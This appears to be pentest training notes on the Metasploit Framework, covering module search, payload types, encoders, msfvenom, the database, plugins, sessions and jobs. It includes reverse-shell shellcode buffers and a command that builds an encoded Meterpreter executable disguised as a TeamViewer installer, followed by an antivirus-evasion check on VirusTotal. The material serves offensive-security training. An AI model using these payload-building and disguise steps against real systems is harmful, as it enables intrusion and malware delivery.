# Metasploit The Metasploit Framework (MSF) is an excellent tool for pentesters. It contains many built-in exploits for many public vulnerabilities and provides an easy way to use these exploits against vulnerable targets. `msfconsole` There are many retired boxes on the Hack The Box platform that are great for practicing Metasploit. Some of these include, but not limited to: * Granny/Grandpa * Jerry * Blue * Lame * Optimum * Legacy * Devel A Meterpreter shell gives us far more functionality than a raw TCP reverse shell. It is the default payload that is used in Metasploit. By default, all the base files related to Metasploit Framework can be found under `/usr/share/metasploit-framework` ### **Modules** Metasploit `modules` are prepared scripts with a specific purpose and corresponding functions that have already been developed and tested in the wild. The `exploit` category consists of so-called proof-of-concept (`POCs`) that can be used to exploit existing vulnerabilities in a largely automated manner. Many people often think that the failure of the exploit disproves the existence of the suspected vulnerability. However, this is only proof that the Metasploit exploit does not work and not that the vulnerability does not exist. This is because many exploits require customization according to the target hosts to make the exploit work. Therefore, automated tools such as the Metasploit framework should only be considered a support tool and not a substitute for our manual skills. Syntax: \ \/\/\/\ Example: 794 exploit/windows/ftp/scriptftp\_list
TypeDescription
AuxiliaryScanning, fuzzing, sniffing, and admin capabilities. Offer extra assistance and functionality.
EncodersEnsure that payloads are intact to their destination.
ExploitsDefined as modules that exploit a vulnerability that will allow for the payload delivery.
NOPs(No Operation code) Keep the payload sizes consistent across exploit attempts.
PayloadsCode runs remotely and calls back to the attacker machine to establish a connection (or shell).
PluginsAdditional scripts can be integrated within an assessment with msfconsole and coexist.
PostWide array of modules to gather information, pivot deeper, etc.
Note that when selecting a module to use for payload delivery, the `use ` command can only be used with the following modules that can be used as `initiators` (or interactable modules):
TypeDescription
AuxiliaryScanning, fuzzing, sniffing, and admin capabilities. Offer extra assistance and functionality.
ExploitsDefined as modules that exploit a vulnerability that will allow for the payload delivery.
PostWide array of modules to gather information, pivot deeper, etc.
### Searching for Modules Metasploit also offers a well-developed search function for the existing modules. With the help of this function, we can quickly search through all the modules using specific `tags` to find a suitable one for our target. ```shell-session msf6 > help search Usage: search [] [:] Prepending a value with '-' will exclude any matching results. If no options or keywords are provided, cached results are displayed. OPTIONS: -h Show this help information -o Send output to a file in csv format -S Regex pattern used to filter search results -u Use module if there is one result -s Sort the research results based on in ascending order -r Reverse the search results order to descending order Keywords: aka : Modules with a matching AKA (also-known-as) name author : Modules written by this author arch : Modules affecting this architecture bid : Modules with a matching Bugtraq ID cve : Modules with a matching CVE ID edb : Modules with a matching Exploit-DB ID check : Modules that support the 'check' method date : Modules with a matching disclosure date description : Modules with a matching description fullname : Modules with a matching full name mod_time : Modules with a matching modification date name : Modules with a matching descriptive name path : Modules with a matching path platform : Modules affecting this platform port : Modules with a matching port rank : Modules with a matching rank (Can be descriptive (ex: 'good') or numeric with comparison operators (ex: 'gte400')) ref : Modules with a matching ref reference : Modules with a matching reference target : Modules affecting this target type : Modules of a specific type (exploit, payload, auxiliary, encoder, evasion, post, or nop) Supported search columns: rank : Sort modules by their exploitabilty rank date : Sort modules by their disclosure date. Alias for disclosure_date disclosure_date : Sort modules by their disclosure date name : Sort modules by their name type : Sort modules by their type check : Sort modules by whether or not they have a check method Examples: search cve:2009 type:exploit search cve:2009 type:exploit platform:-linux search cve:2009 -s name search type:exploit -s type -r ``` We can also make our search a bit more coarse and reduce it to one category of services. For example, for the CVE, we could specify the year (`cve:`), the platform Windows (`platform:`), the type of module we want to find (`type:`), the reliability rank (`rank:`), and the search name (``). This would reduce our results to only those that match all of the above. ```shell-session msf6 > search type:exploit platform:windows cve:2021 rank:excellent microsoft Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 exploit/windows/http/exchange_proxylogon_rce 2021-03-02 excellent Yes Microsoft Exchange ProxyLogon RCE 1 exploit/windows/http/exchange_proxyshell_rce 2021-04-06 excellent Yes Microsoft Exchange ProxyShell RCE 2 exploit/windows/http/sharepoint_unsafe_control 2021-05-11 excellent Yes Microsoft SharePoint Unsafe Control and ViewState RCE ``` We can use the command `info` after selecting the module if we want to know something more about the module. This will give us a series of information that can be important for us. In addition, there is the option `setg`, which specifies options selected by us as permanent until the program is restarted. Therefore, if we are working on a particular target host, we can use this command to set the IP address once and not change it again until we change our focus to a different IP address. ### Targets `Targets` are unique operating system identifiers taken from the versions of those specific operating systems which adapt the selected exploit module to run on that particular version of the operating system. The `show targets` command issued within an exploit module view will display all available vulnerable targets for that specific exploit, while issuing the same command in the root menu, outside of any selected exploit module, will let us know that we need to select an exploit module first. ### **Payloads** Refers to a module that aids the exploit module in (typically) returning a shell to the attacker. The payloads are sent together with the exploit itself to bypass standard functioning procedures of the vulnerable service (`exploits job`) and then run on the target OS to typically return a reverse connection to the attacker and establish a foothold (`payload's job`). There are three different types of payload modules in the Metasploit Framework: Singles, Stagers, and Stages. Using three typologies of payload interaction will prove beneficial to the pentester. It can offer the flexibility we need to perform certain types of tasks. Whether or not a payload is staged is represented by `/` in the payload name. For example, `windows/shell_bind_tcp` is a single payload with no stage, whereas `windows/shell/bind_tcp` consists of a stager (`bind_tcp`) and a stage (`shell`). A `Single` payload contains the exploit and the entire shellcode for the selected task. Inline payloads are by design more stable than their counterparts because they contain everything all-in-one. However, some exploits will not support the resulting size of these payloads as they can get quite large. `Singles` are self-contained payloads. They are the sole object sent and executed on the target system, getting us a result immediately after running. A Single payload can be as simple as adding a user to the target system or booting up a process. **Stagers** `Stager` payloads work with Stage payloads to perform a specific task. A Stager is waiting on the attacker machine, ready to establish a connection to the victim host once the stage completes its run on the remote host. `Stagers` are typically used to set up a network connection between the attacker and victim and are designed to be small and reliable. Metasploit will use the best one and fall back to a less-preferred one when necessary. Windows NX vs. NO-NX Stagers * Reliability issue for NX CPUs and DEP * NX stagers are bigger (VirtualAlloc memory) * Default is now NX + Win7 compatible **Stages** `Stages` are payload components that are downloaded by stager's modules. The various payload Stages provide advanced features with no size limits, such as Meterpreter, VNC Injection, and others. Payload stages automatically use middle stagers: * A single `recv()` fails with large payloads * The Stager receives the middle stager * The middle Stager then performs a full download * Also better for RWX **Meterpreter Payload** The `Meterpreter` payload is a specific type of multi-faceted payload that uses `DLL injection` to ensure the connection to the victim host is stable, hard to detect by simple checks, and persistent across reboots or system changes. Meterpreter resides completely in the memory of the remote host and leaves no traces on the hard drive, making it very difficult to detect with conventional forensic techniques. In addition, scripts and plugins can be `loaded and unloaded` dynamically as required. ### Searching for Payloads To select our first payload, we need to know what we want to do on the target machine. For example, if we are going for access persistence, we will probably want to select a Meterpreter payload. As mentioned above, Meterpreter payloads offer us a significant amount of flexibility. Their base functionality is already vast and influential. We can automate and quickly deliver combined with plugins such as [GentilKiwi's Mimikatz Plugin](https://github.com/gentilkiwi/mimikatz) parts of the pentest while keeping an organized, time-effective assessment. To see all of the available payloads, use the `show payloads` command in `msfconsole`. ### Encoders Over the 15 years of existence of the Metasploit Framework, `Encoders` have assisted with making payloads compatible with different processor architectures while at the same time helping with antivirus evasion. `Encoders` come into play with the role of changing the payload to run on different operating systems and architectures. These architectures include: | `x64` | `x86` | `sparc` | `ppc` | `mips` | | ----- | ----- | ------- | ----- | ------ | They are also needed to remove hexadecimal opcodes known as `bad characters` from the payload. Not only that but encoding the payload in different formats could help with the AV detection as mentioned above. However, the use of encoders strictly for AV evasion has diminished over time, as IPS/IDS manufacturers have improved how their protection software deals with signatures in malware and viruses. Shikata Ga Nai (`SGN`) is one of the most utilized Encoding schemes today because it is so hard to detect that payloads encoded through its mechanism are not universally undetectable anymore. Far from it. The name (`仕方がない`) means `It cannot be helped` or `Nothing can be done about it`, and rightfully so if we were reading this a few years ago. However, there are other methodologies we will explore to evade protection systems. [This article from FireEye](https://www.fireeye.com/blog/threat-research/2019/10/shikata-ga-nai-encoder-still-going-strong.html) details the why and the how of Shikata Ga Nai's previous rule over the other encoders. ### Selecting an Encoder Before 2015, the Metasploit Framework had different submodules that took care of payloads and encoders. They were packed separately from the msfconsole script and were called `msfpayload` and `msfencode`. These two tools are located in `/usr/share/framework2/`. If we wanted to create our custom payload, we could do so through `msfpayload`, but we would have to encode it according to the target OS architecture using `msfencode` afterward. A pipe would take the output from one command and feed it into the next, which would generate an encoded payload, ready to be sent and run on the target machine. ```shell-session oflavioc@htb[/htb]$ msfpayload windows/shell_reverse_tcp LHOST=127.0.0.1 LPORT=4444 R | msfencode -b '\x00' -f perl -e x86/shikata_ga_nai [*] x86/shikata_ga_nai succeeded with size 1636 (iteration=1) my $buf = "\xbe\x7b\xe6\xcd\x7c\xd9\xf6\xd9\x74\x24\xf4\x58\x2b\xc9" . "\x66\xb9\x92\x01\x31\x70\x17\x83\xc0\x04\x03\x70\x13\xe2" . "\x8e\xc9\xe7\x76\x50\x3c\xd8\xf1\xf9\x2e\x7c\x91\x8e\xdd" . "\x53\x1e\x18\x47\xc0\x8c\x87\xf5\x7d\x3b\x52\x88\x0e\xa6" . "\xc3\x18\x92\x58\xdb\xcd\x74\xaa\x2a\x3a\x55\xae\x35\x36" . "\xf0\x5d\xcf\x96\xd0\x81\xa7\xa2\x50\xb2\x0d\x64\xb6\x45" . "\x06\x0d\xe6\xc4\x8d\x85\x97\x65\x3d\x0a\x37\xe3\xc9\xfc" . "\xa4\x9c\x5c\x0b\x0b\x49\xbe\x5d\x0e\xdf\xfc\x2e\xc3\x9a" . "\x3d\xd7\x82\x48\x4e\x72\x69\xb1\xfc\x34\x3e\xe2\xa8\xf9" . "\xf1\x36\x67\x2c\xc2\x18\xb7\x1e\x13\x49\x97\x12\x03\xde" . "\x85\xfe\x9e\xd4\x1d\xcb\xd4\x38\x7d\x39\x35\x6b\x5d\x6f" . "\x50\x1d\xf8\xfd\xe9\x84\x41\x6d\x60\x29\x20\x12\x08\xe7" . "\xcf\xa0\x82\x6e\x6a\x3a\x5e\x44\x58\x9c\xf2\xc3\xd6\xb9" . ``` After 2015, updates to these scripts have combined them within the `msfvenom` tool, which takes care of payload generation and Encoding. Below is an example of what payload generation would look like with today's `msfvenom`: **Generating Payload - Without Encoding** ```shell-session oflavioc@htb[/htb]$ msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -b "\x00" -f perl Found 11 compatible encoders Attempting to encode payload with 1 iterations of x86/shikata_ga_nai x86/shikata_ga_nai succeeded with size 381 (iteration=0) x86/shikata_ga_nai chosen with final size 381 Payload size: 381 bytes Final size of perl file: 1674 bytes my $buf = "\xda\xc1\xba\x37\xc7\xcb\x5e\xd9\x74\x24\xf4\x5b\x2b\xc9" . "\xb1\x59\x83\xeb\xfc\x31\x53\x15\x03\x53\x15\xd5\x32\x37" . "\xb6\x96\xbd\xc8\x47\xc8\x8c\x1a\x23\x83\xbd\xaa\x27\xc1" . "\x4d\x42\xd2\x6e\x1f\x40\x2c\x8f\x2b\x1a\x66\x60\x9b\x91" . "\x50\x4f\x23\x89\xa1\xce\xdf\xd0\xf5\x30\xe1\x1a\x08\x31" . ``` We should now look at the first line of the `$buf` and see how it changes when applying an encoder like `shikata_ga_nai`. **Generating Payload - With Encoding** ```shell-session oflavioc@htb[/htb]$ msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -b "\x00" -f perl -e x86/shikata_ga_nai Found 1 compatible encoders Attempting to encode payload with 3 iterations of x86/shikata_ga_nai x86/shikata_ga_nai succeeded with size 326 (iteration=0) x86/shikata_ga_nai succeeded with size 353 (iteration=1) x86/shikata_ga_nai succeeded with size 380 (iteration=2) x86/shikata_ga_nai chosen with final size 380 Payload size: 380 bytes buf = "" buf += "\xbb\x78\xd0\x11\xe9\xda\xd8\xd9\x74\x24\xf4\x58\x31" buf += "\xc9\xb1\x59\x31\x58\x13\x83\xc0\x04\x03\x58\x77\x32" buf += "\xe4\x53\x15\x11\xea\xff\xc0\x91\x2c\x8b\xd6\xe9\x94" buf += "\x47\xdf\xa3\x79\x2b\x1c\xc7\x4c\x78\xb2\xcb\xfd\x6e" buf += "\xc2\x9d\x53\x59\xa6\x37\xc3\x57\x11\xc8\x77\x77\x9e" ``` Suppose we want to select an Encoder for an `existing payload`. Then, we can use the `show encoders` command within the `msfconsole` to see which encoders are available for our current `Exploit module + Payload` combination. One better option would be to try running it through multiple iterations of the same Encoding scheme: ```shell-session oflavioc@htb[/htb]$ msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=10.10.14.5 LPORT=8080 -e x86/shikata_ga_nai -f exe -i 10 -o /root/Desktop/TeamViewerInstall.exe Found 1 compatible encoders Attempting to encode payload with 10 iterations of x86/shikata_ga_nai x86/shikata_ga_nai succeeded with size 368 (iteration=0) x86/shikata_ga_nai succeeded with size 395 (iteration=1) x86/shikata_ga_nai succeeded with size 422 (iteration=2) x86/shikata_ga_nai succeeded with size 449 (iteration=3) x86/shikata_ga_nai succeeded with size 476 (iteration=4) x86/shikata_ga_nai succeeded with size 503 (iteration=5) x86/shikata_ga_nai succeeded with size 530 (iteration=6) x86/shikata_ga_nai succeeded with size 557 (iteration=7) x86/shikata_ga_nai succeeded with size 584 (iteration=8) x86/shikata_ga_nai succeeded with size 611 (iteration=9) x86/shikata_ga_nai chosen with final size 611 Payload size: 611 bytes Final size of exe file: 73802 bytes Error: Permission denied @ rb_sysopen - /root/Desktop/TeamViewerInstall.exe ``` As we can see, it is still not enough for AV evasion. There is a high number of products that still detect the payload. Alternatively, Metasploit offers a tool called `msf-virustotal` that we can use with an API key to analyze our payloads. However, this requires free registration on VirusTotal. ```shell-session oflavioc@htb[/htb]$ msf-virustotal -k -f TeamViewerInstall.exe [*] Using API key: [*] Please wait while I upload TeamViewerInstall.exe... [*] VirusTotal: Scan request successfully queued, come back later for the report [*] Sample MD5 hash : 4f54cc46e2f55be168cc6114b74a3130 [*] Sample SHA1 hash : 53fcb4ed92cf40247782de41877b178ef2a9c5a9 [*] Sample SHA256 hash : 66894cbecf2d9a31220ef811a2ba65c06fdfecddbc729d006fdab10e43368da8 [*] Analysis link: https://www.virustotal.com/gui/file//detection/f--1651750343 [*] Requesting the report... [*] Received code -2. Waiting for another 60 seconds... [*] Received code -2. Waiting for another 60 seconds... [*] Received code -2. Waiting for another 60 seconds... [*] Received code -2. Waiting for another 60 seconds... [*] Received code -2. Waiting for another 60 seconds... [*] Received code -2. Waiting for another 60 seconds... [*] Analysis Report: TeamViewerInstall.exe (51 / 68): 66894cbecf2d9a31220ef811a2ba65c06fdfecddbc729d006fdab10e43368da8 ================================================================================================================== Antivirus Detected Version Result Update --------- -------- ------- ------ ------ ALYac true 1.1.3.1 Trojan.CryptZ.Gen 20220505 APEX true 6.288 Malicious 20220504 AVG true 21.1.5827.0 Win32:SwPatch [Wrm] 20220505 Acronis true 1.2.0.108 suspicious 20220426 Ad-Aware true 3.0.21.193 Trojan.CryptZ.Gen 20220505 AhnLab-V3 true 3.21.3.10230 Trojan/Win32.Shell.R1283 20220505 Alibaba false 0.3.0.5 20190527 Antiy-AVL false 3.0 20220505 Arcabit true 1.0.0.889 Trojan.CryptZ.Gen 20220505 Avast true 21.1.5827.0 Win32:SwPatch [Wrm] 20220505 Avira true 8.3.3.14 TR/Patched.Gen2 20220505 Baidu false 1.0.0.2 20190318 BitDefender true 7.2 Trojan.CryptZ.Gen 20220505 BitDefenderTheta true 7.2.37796.0 Gen:NN.ZexaF.34638.eq1@aC@Q!ici 20220428 Bkav true 1.3.0.9899 W32.FamVT.RorenNHc.Trojan 20220505 CAT-QuickHeal true 14.00 Trojan.Swrort.A ``` ### Databases `Databases` in `msfconsole` are used to keep track of your results. `Msfconsole` has built-in support for the PostgreSQL database system. With it, we have direct, quick, and easy access to scan results with the added ability to import and export results in conjunction with third-party tools. Database entries can also be used to configure Exploit module parameters with the already existing findings directly. ### Setting up the Database First, we must ensure that the PostgreSQL server is up and running on our host machine. To do so, input the following command: ```shell-session oflavioc@htb[/htb]$ sudo service postgresql status ● postgresql.service - PostgreSQL RDBMS Loaded: loaded (/lib/systemd/system/postgresql.service; disabled; vendor preset: disabled) Active: active (exited) since Fri 2022-05-06 14:51:30 BST; 3min 51s ago Process: 2147 ExecStart=/bin/true (code=exited, status=0/SUCCESS) Main PID: 2147 (code=exited, status=0/SUCCESS) CPU: 1ms May 06 14:51:30 pwnbox-base systemd[1]: Starting PostgreSQL RDBMS... May 06 14:51:30 pwnbox-base systemd[1]: Finished PostgreSQL RDBMS. ``` **Start PostgreSQL** ```shell-session oflavioc@htb[/htb]$ sudo systemctl start postgresql ``` After starting PostgreSQL, we need to create and initialize the MSF database with `msfdb init`. ```shell-session oflavioc@htb[/htb]$ sudo msfdb init [i] Database already started [+] Creating database user 'msf' [+] Creating databases 'msf' [+] Creating databases 'msf_test' [+] Creating configuration file '/usr/share/metasploit-framework/config/database.yml' [+] Creating initial database schema rake aborted! NoMethodError: undefined method `without' for # Did you mean? with_options ``` Sometimes an error can occur if Metasploit is not up to date. This difference that causes the error can happen for several reasons. First, often it helps to update Metasploit again (`apt update`) to solve this problem. Then we can try to reinitialize the MSF database. **MSF - Connect to the Initiated Database** ```shell-session oflavioc@htb[/htb]$ sudo msfdb run ``` If, however, we already have the database configured and are not able to change the password to the MSF username, proceed with these commands: **MSF - Reinitiate the Database** ```shell-session oflavioc@htb[/htb]$ msfdb reinit oflavioc@htb[/htb]$ cp /usr/share/metasploit-framework/config/database.yml ~/.msf4/ oflavioc@htb[/htb]$ sudo service postgresql restart oflavioc@htb[/htb]$ msfconsole -q msf6 > db_status [*] Connected to msf. Connection type: PostgreSQ ``` ### Using the Database With the help of the database, we can manage many different categories and hosts that we have analyzed. Alternatively, the information about them that we have interacted with using Metasploit. These databases can be exported and imported. This is especially useful when we have extensive lists of hosts, loot, notes, and stored vulnerabilities for these hosts. After confirming that the database is successfully connected, we can organize our `Workspaces`. **Workspaces** We can think of `Workspaces` the same way we would think of folders in a project. We can segregate the different scan results, hosts, and extracted information by IP, subnet, network, or domain. To view the current Workspace list, use the `workspace` command. Adding a `-a` or `-d` switch after the command, followed by the workspace's name, will either `add` or `delete` that workspace to the database. The default Workspace is named `default` and is currently in use according to the `*` symbol. Type the `workspace [name]` command to switch the presently used workspace. Looking back at our example, let us create a workspace for this assessment and select it. ```shell-session msf6 > workspace -a Target_1 [*] Added workspace: Target_1 [*] Workspace: Target_1 msf6 > workspace Target_1 [*] Workspace: Target_1 msf6 > workspace default * Target_1 ``` ### Importing Scan Results Next, let us assume we want to import a `Nmap scan` of a host into our Database's Workspace to understand the target better. We can use the `db_import` command for this. After the import is complete, we can check the presence of the host's information in our database by using the `hosts` and `services` commands. Note that the `.xml` file type is preferred for `db_import`. **Stored Nmap Scan** ```shell-session oflavioc@htb[/htb]$ cat Target.nmap Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-17 20:54 UTC Nmap scan report for 10.10.10.40 Host is up (0.017s latency). Not shown: 991 closed ports PORT STATE SERVICE VERSION 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP) 49152/tcp open msrpc Microsoft Windows RPC 49153/tcp open msrpc Microsoft Windows RPC 49154/tcp open msrpc Microsoft Windows RPC 49155/tcp open msrpc Microsoft Windows RPC 49156/tcp open msrpc Microsoft Windows RPC 49157/tcp open msrpc Microsoft Windows RPC Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 60.81 seconds ``` **Importing Scan Results** ```shell-session msf6 > db_import Target.xml [*] Importing 'Nmap XML' data [*] Import: Parsing with 'Nokogiri v1.10.9' [*] Importing host 10.10.10.40 [*] Successfully imported ~/Target.xml msf6 > hosts Hosts ===== address mac name os_name os_flavor os_sp purpose info comments ------- --- ---- ------- --------- ----- ------- ---- -------- 10.10.10.40 Unknown device msf6 > services Services ======== host port proto name state info ---- ---- ----- ---- ----- ---- 10.10.10.40 135 tcp msrpc open Microsoft Windows RPC 10.10.10.40 139 tcp netbios-ssn open Microsoft Windows netbios-ssn 10.10.10.40 445 tcp microsoft-ds open Microsoft Windows 7 - 10 microsoft-ds workgroup: WORKGROUP 10.10.10.40 49152 tcp msrpc open Microsoft Windows RPC 10.10.10.40 49153 tcp msrpc open Microsoft Windows RPC 10.10.10.40 49154 tcp msrpc open Microsoft Windows RPC 10.10.10.40 49155 tcp msrpc open Microsoft Windows RPC 10.10.10.40 49156 tcp msrpc open Microsoft Windows RPC 10.10.10.40 49157 tcp msrpc open Microsoft Windows RPC ``` ### Using Nmap Inside MSFconsole Alternatively, we can use Nmap straight from msfconsole! To scan directly from the console without having to background or exit the process, use the `db_nmap` command. ```shell-session msf6 > db_nmap -sV -sS 10.10.10.8 [*] Nmap: Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-17 21:04 UTC [*] Nmap: Nmap scan report for 10.10.10.8 [*] Nmap: Host is up (0.016s latency). [*] Nmap: Not shown: 999 filtered ports [*] Nmap: PORT STATE SERVICE VERSION [*] Nmap: 80/TCP open http HttpFileServer httpd 2.3 [*] Nmap: Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows [*] Nmap: Service detection performed. Please report any incorrect results at https://nmap.org/submit/ [*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 11.12 seconds ``` ### Data Backup After finishing the session, make sure to back up our data if anything happens with the PostgreSQL service. To do so, use the `db_export` command. This data can be imported back to msfconsole later when needed. Other commands related to data retention are the extended use of `hosts`, `services`, and the `creds` and `loot` commands. ### Hosts The `hosts` command displays a database table automatically populated with the host addresses, hostnames, and other information we find about these during our scans and interactions. For example, suppose `msfconsole` is linked with scanner plugins that can perform service and OS detection. In that case, this information should automatically appear in the table once the scans are completed through msfconsole. Again, tools like Nessus, NexPose, or Nmap will help us in these cases. Hosts can also be manually added as separate entries in this table. After adding our custom hosts, we can also organize the format and structure of the table, add comments, change existing information, and more. **MSF - Stored Hosts** ```shell-session msf6 > hosts -h Usage: hosts [ options ] [addr1 addr2 ...] OPTIONS: -a,--add Add the hosts instead of searching -d,--delete Delete the hosts instead of searching -c Only show the given columns (see list below) -C Only show the given columns until the next restart (see list below) -h,--help Show this help information -u,--up Only show hosts which are up -o Send output to a file in CSV format -O Order rows by specified column number -R,--rhosts Set RHOSTS from the results of the search -S,--search Search string to filter by -i,--info Change the info of a host -n,--name Change the name of a host -m,--comment Change the comment of a host -t,--tag Add or specify a tag to a range of hosts ``` ### Services The `services` command functions the same way as the previous one. It contains a table with descriptions and information on services discovered during scans or interactions. In the same way as the command above, the entries here are highly customizable. **MSF - Stored Services of Hosts** ```shell-session msf6 > services -h Usage: services [-h] [-u] [-a] [-r ] [-p ] [-s ] [-o ] [addr1 addr2 ...] -a,--add Add the services instead of searching -d,--delete Delete the services instead of searching -c Only show the given columns -h,--help Show this help information -s Name of the service to add -p Search for a list of ports -r Protocol type of the service being added [tcp|udp] -u,--up Only show services which are up -o Send output to a file in csv format -O Order rows by specified column number -R,--rhosts Set RHOSTS from the results of the search -S,--search Search string to filter by -U,--update Update data for existing service ``` ### Credentials The `creds` command allows you to visualize the credentials gathered during your interactions with the target host. We can also add credentials manually, match existing credentials with port specifications, add descriptions, etc. ```shell-session msf6 > creds -h With no sub-command, list credentials. If an address range is given, show only credentials with logins on hosts within that range. Usage - Listing credentials: creds [filter options] [address range] Usage - Adding credentials: creds add uses the following named parameters. user : Public, usually a username password : Private, private_type Password. ntlm : Private, private_type NTLM Hash. Postgres : Private, private_type Postgres MD5 ssh-key : Private, private_type SSH key, must be a file path. hash : Private, private_type Nonreplayable hash jtr : Private, private_type John the Ripper hash type. realm : Realm, realm-type: Realm, realm_type (domain db2db sid pgdb rsync wildcard), defaults to domain. ``` ### Loot The `loot` command works in conjunction with the command above to offer you an at-a-glance list of owned services and users. The loot, in this case, refers to hash dumps from different system types, namely hashes, passwd, shadow, and more. ### Plugins To start using a plugin, we will need to ensure it is installed in the correct directory on our machine. Navigating to `/usr/share/metasploit-framework/plugins`, which is the default directory for every new installation of `msfconsole`, should show us which plugins we have to our availability: ```shell-session oflavioc@htb[/htb]$ ls /usr/share/metasploit-framework/plugins aggregator.rb beholder.rb event_tester.rb komand.rb msfd.rb nexpose.rb request.rb session_notifier.rb sounds.rb token_adduser.rb wmap.rb alias.rb db_credcollect.rb ffautoregen.rb lab.rb msgrpc.rb openvas.rb rssfeed.rb session_tagger.rb sqlmap.rb token_hunter.rb auto_add_route.rb db_tracker.rb ips_filter.rb libnotify.rb nessus.rb pcap_log.rb sample.rb socket_logger.rb thread.rb wiki.rb ``` `load "plugin name"` To install new custom plugins not included in new updates of the distro, we can take the .rb file provided on the maker's page and place it in the folder at `/usr/share/metasploit-framework/plugins` with the proper permissions. For example, let us try installing [DarkOperator's Metasploit-Plugins](https://github.com/darkoperator/Metasploit-Plugins.git). Then, following the link above, we get a couple of Ruby (`.rb`) files which we can directly place in the folder mentioned above. **Downloading MSF Plugins** ```shell-session oflavioc@htb[/htb]$ git clone https://github.com/darkoperator/Metasploit-Plugins oflavioc@htb[/htb]$ ls Metasploit-Plugins aggregator.rb ips_filter.rb pcap_log.rb sqlmap.rb alias.rb komand.rb pentest.rb thread.rb auto_add_route.rb lab.rb request.rb token_adduser.rb beholder.rb libnotify.rb rssfeed.rb token_hunter.rb db_credcollect.rb msfd.rb sample.rb twitt.rb db_tracker.rb msgrpc.rb session_notifier.rb wiki.rb event_tester.rb nessus.rb session_tagger.rb wmap.rb ffautoregen.rb nexpose.rb socket_logger.rb growl.rb openvas.rb sounds.rb ``` Here we can take the plugin `pentest.rb` as an example and copy it to `/usr/share/metasploit-framework/plugins`. ```shell-session oflavioc@htb[/htb]$ sudo cp ./Metasploit-Plugins/pentest.rb /usr/share/metasploit-framework/plugins/pentest.rb ``` Many people write many different plugins for the Metasploit framework. They all have a specific purpose and can be an excellent help to save time after familiarizing ourselves with them. Check out the list of popular plugins below: | | | | | ------------------------------------------------------------------------------------------------------------------- | ----------------------------------------------------------------------------------------------------------------------------------- | --------------------------------------------------------------------------------------------------------------- | | [nMap (pre-installed)](https://nmap.org) | [NexPose (pre-installed)](https://sectools.org/tool/nexpose/) | [Nessus (pre-installed)](https://www.tenable.com/products/nessus) | | [Mimikatz (pre-installed V.1)](http://blog.gentilkiwi.com/mimikatz) | [Stdapi (pre-installed)](https://www.rubydoc.info/github/rapid7/metasploit-framework/Rex/Post/Meterpreter/Extensions/Stdapi/Stdapi) | [Railgun](https://github.com/rapid7/metasploit-framework/wiki/How-to-use-Railgun-for-Windows-post-exploitation) | | [Priv](https://github.com/rapid7/metasploit-framework/blob/master/lib/rex/post/meterpreter/extensions/priv/priv.rb) | [Incognito (pre-installed)](https://www.offensive-security.com/metasploit-unleashed/fun-incognito/) | [Darkoperator's](https://github.com/darkoperator/Metasploit-Plugins) | ### Mixins The Metasploit Framework is written in Ruby, an object-oriented programming language. This plays a big part in what makes `msfconsole` excellent to use. Mixins are one of those features that, when implemented, offer a large amount of flexibility to both the creator of the script and the user. Mixins are classes that act as methods for use by other classes without having to be the parent class of those other classes. Thus, it would be deemed inappropriate to call it inheritance but rather inclusion. They are mainly used when we: 1. Want to provide a lot of optional features for a class. 2. Want to use one particular feature for a multitude of classes. Most of the Ruby programming language revolves around Mixins as Modules. The concept of Mixins is implemented using the word `include`, to which we pass the name of the module as a `parameter`. We can read more about mixins [here](https://en.wikibooks.org/wiki/Metasploit/UsingMixins). ### **Getting Started** First things first, our tools need to be sharp. One of the first things we need to do is make sure the modules that compose the framework are up to date, and any new ones available to the public can be imported. The old way would have been to run `msfupdate` in our OS terminal (outside `msfconsole`). However, the `apt` package manager can currently handle the update of modules and features effortlessly. ```shell-session oflavioc@htb[/htb]$ sudo apt update && sudo apt install metasploit-framework ``` ### Sessions MSFconsole can manage multiple modules at the same time. This is one of the many reasons it provides the user with so much flexibility. This is done with the use of `Sessions`, which creates dedicated control interfaces for all of your deployed modules. While running any available exploits or auxiliary modules in msfconsole, we can background the session as long as they form a channel of communication with the target host. This can be done either by pressing the `[CTRL] + [Z]` key combination or by typing the `background` command in the case of Meterpreter stages. This will prompt us with a confirmation message. After accepting the prompt, we will be taken back to the msfconsole prompt (`msf6 >`) and will immediately be able to launch a different module. We can use the `sessions` command to view our currently active sessions.\ You can use the `sessions -i [no.]` command to open up a specific session. This is specifically useful when we want to run an additional module on an already exploited system with a formed, stable communication channel. This can be done by backgrounding our current session, which is formed due to the success of the first exploit, searching for the second module we wish to run, and, if made possible by the type of module selected, selecting the session number on which the module should be run. This can be done from the second module's `show options` menu. Usually, these modules can be found in the `post` category, referring to Post-Exploitation modules. The main archetypes of modules in this category consist of credential gatherers, local exploit suggesters, and internal network scanners. ### Jobs If, for example, we are running an active exploit under a specific port and need this port for a different module, we cannot simply terminate the session using `[CTRL] + [C]`. If we did that, we would see that the port would still be in use, affecting our use of the new module. So instead, we would need to use the `jobs` command to look at the currently active tasks running in the background and terminate the old ones to free up the port. Other types of tasks inside sessions can also be converted into jobs to run in the background seamlessly, even if the session dies or disappears. ```shell-session msf6 exploit(multi/handler) > jobs -h Usage: jobs [options] Active job manipulation and interaction. OPTIONS: -K Terminate all running jobs. -P Persist all running jobs on restart. -S Row search filter. -h Help banner. -i Lists detailed information about a running job. -k Terminate jobs by job ID and/or range. -l List all running jobs. -p Add persistence to job by job ID -v Print more detailed info. Use with -i and -l ``` **Viewing the Exploit Command Help Menu** When we run an exploit, we can run it as a job by typing `exploit -j`. Per the help menu for the `exploit` command, adding `-j` to our command. Instead of just `exploit` or `run`, will "run it in the context of a job." ```shell-session msf6 exploit(multi/handler) > exploit -j [*] Exploit running as background job 0. [*] Exploit completed, but no session was created. [*] Started reverse TCP handler on 10.10.14.34:4444 